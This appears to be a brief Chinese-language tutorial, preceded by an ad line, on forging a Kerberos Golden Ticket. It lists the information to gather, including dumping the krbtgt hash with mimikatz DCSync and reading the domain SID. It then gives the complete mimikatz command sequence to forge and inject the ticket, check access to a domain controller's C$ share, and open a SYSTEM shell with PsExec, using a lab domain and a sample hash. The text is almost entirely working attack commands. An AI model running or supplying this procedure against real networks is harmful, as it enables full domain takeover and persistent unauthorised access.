合规国际互联网加速 OSASE为企业客户提供高速稳定SD-WAN国际加速解决方案。 广告
[TOC] ## 信息收集 1. 完整的域名称 1. krbtgt账户的NTLM Hash 或者 AES-256 ``` 域控的mimikatz 中运行:lsadump::dcsync /domain:dongta.test /user:krbtgt ``` 1. 域的sid ``` wmic useraccount get name,sid,dome ``` 1. 需要伪造的域管理员用户名 ## mimikatz工具伪造黄金票据 ~~~ 创建黄金票据 kerberos::golden /admin:administrator /domain:dongta.test /sid:S-1-5-21-4119513073-439187860-1128162503 /krbtgt:bf1f6b7aa523778b5a45036c58c1a83b /ticket:administrator.kiribi 清空票据 kerberos::purge 导入票据 kerberos::ptt administrator.kiribi 查看票据cmd中运行 klist 验证票据 dir \\dc1\c$ 建立shell Psexec.exe \\dc1 -s cmd.exe ~~~